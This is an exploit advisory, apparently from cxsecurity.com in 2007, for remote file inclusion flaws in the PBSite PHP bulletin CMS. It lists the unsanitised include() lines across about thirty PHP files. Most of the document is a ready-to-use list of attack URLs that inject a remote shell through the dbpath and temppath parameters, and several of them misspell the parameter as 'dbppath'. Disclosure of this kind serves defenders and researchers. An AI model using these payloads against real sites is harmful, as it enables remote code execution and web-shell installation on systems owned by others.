PBSite - PHP Bulletin Site | CMS ====> RFI

2007.06.08
Credit: pito pito
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

script:PBSite - PHP Bulletin Site | CMS ====> RFI url:http://sourceforge.net/project/showfiles.php?group_id=88114 authot:titanichacker (the-modest-pirate (at) hotmail (dot) com [email concealed]) contact: hack-teach.com & mohandko.com & tryag.com %%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%% bug in: %%% %%%%%%%%%%% ./useronline.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_".$language.".php"); %%% ./ucp.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%% ./setcookie.php include($temppath."/pb/language/lang_".$language.".php"); include($dbpath.'/settings.php'); %%%%%%%%%% ./sendpm.php include($dbpath."/settings.php"); %%%%%%%%%%% ./search.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%% ./register.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%% ./profile.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%% ./post.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include($temppath."/pb/language/lang_".$language.".php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%% ./pmpshow.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%% ./pm.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%% ./ntopic.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%% ./nreply.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include($temppath."/pb/language/lang_".$language.".php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%% ./news.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include ($dbpath."/posts/".$cat."_".$fid."_".$pid); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%%% ./memberslist.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%%%%% ./logout.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); include ($dbpath."/posts/".$cat."_".$fid."_".$pid); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%%%%%% ./login.php include($dbpath."/settings.php"); include_once("$temppath/$template/language/lang_$language.php"); include_once("$temppath/$template/language/lang_$language.php"); %%%%%%%%%%%%%%%%%%%%%%%%% ./index.php include($dbpath."/settings.php"); include_once("$temppath/$template/language/lang_$language.php"); include_once("$temppath/$template/language/lang_$language.php"); %%%%%%%%%%%%%%%%% ./help.php include($dbpath."/settings.php"); include_once($dbpath."/settings/styles/styles.php"); include("$temppath/$template/language/lang_$language.php"); %%%%%%%%%%%%% ./forum.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_$language.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%% ./error.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_$language.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%% ./editpost.php include($dbpath."/settings.php"); %%%%%%%%%%%% ./delpost.php include($dbpath."/settings.php"); %%%%%%%%%% ./delpm.php include($dbpath."/settings.php"); include("$temppath/pb/language/lang_$language.php"); %%%%%%%%%%%% ./confirm.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%%% ./board.php include($dbpath."/settings.php"); include($temppath."/pb/language/lang_".$language.".php"); %%%%%%%%%%%%%%%% ./admin2.php include($dbpath."/settings.php"); %%%%%%%%%%%%%%%%%% ./admin.php include($dbpath."/settings.php"); include($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%%%%% ./templates/pb/css/formstyles.php include ($dbpath."/settings/styles/styles.php"); %%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%% exploit:%% %%%%%%%%% http://victim/path/useronline.php?dbpath=[shell] http://victim/path/useronline.php?temppath=[shell] %%%%% http://victim/path/ucp.php?dbpath=[shell] %%%%% http://victim/path/setcookie.php?temppath=[shell] http://victim/path/setcookie.php?dbppath=[shell] %%%%% http://victim/path/sendpm.php?dbppath=[shell] %%%%%%% http://victim/path/search.php?dbppath=[shell] http://victim/path/search.php?temppath=[shell] %%%%%%%%% http://victim/path/register.php?dbppath=[shell] http://victim/path/register.php?temppath=[shell] %%%%%%%%%% http://victim/path/profile.php?dbpath=[shell] %%%%%%%% http://victim/path/post.php?dbppath=[shell] http://victim/path/post.php?temppath=[shell] %%%%%%%%% http://victim/path/pmpshow.php?dbppath=[shell] %%%%%%%%%%% http://victim/path/pm.php?dbppath=[shell] %%%%%%%%%%%% http://victim/path/ntopic.php?dbppath=[shell] %%%%%%%% http://victim/path/nreply.php?dbppath=[shell] http://victim/path/nreply.php?temppath=[shell] %%%%%%%%%%%% http://victim/path/news.php?dbppath=[shell] http://victim/path/news.php?temppath=[shell] %%%%%%%%%%% http://victim/path/memberslist.php?dbppath=[shell] %%%%%%%%%%%%%% http://victim/path/logout.php?dbppath=[shell] http://victim/path/logout.php?temppath=[shell] %%%%%%%%%%%%%%%%%% http://victim/path/login.php?dbppath=[shell] http://victim/path/login.php?temppath=[shell] %%%%%%%%%%%%%%%%% http://victim/path/index.php?dbppath=[shell] http://victim/path/index.php?temppath=[shell] %%%%%%%%%%%%% http://victim/path/help.php?dbppath=[shell] http://victim/path/help.php?temppath=[shell] %%%%%%%%%% http://victim/path/forum.php?dbppath=[shell] http://victim/path/forum.php?temppath=[shell] %%%%%%%%%%% http://victim/path/error.php?dbppath=[shell] http://victim/path/error.php?temppath=[shell] %%%%%%%%%%% http://victim/path/editpost.php?dbppath=[shell] %%%%%%%%%% http://victim/path/delpost.php?dbppath=[shell] %%%%%%%%%%% http://victim/path/delpm.php?dbppath=[shell] http://victim/path/delpm.php?temppath=[shell] %%%%%%%%%%% http://victim/path/confirm.php?dbppath=[shell] http://victim/path/confirm.php?temppath=[shell] %%%%%%%%%%% http://victim/path/board.php?dbppath=[shell] http://victim/path/board.php?temppath=[shell] %%%%%%%%%%% http://victim/path/admin2.php?dbppath=[shell] %%%%%%%%%%% http://victim/path/admin.php?dbppath=[shell] %%%%%%%%%%%% http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell] %%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%% thanx %%%%%%%%% cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 & milw0rm & xp10 %%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top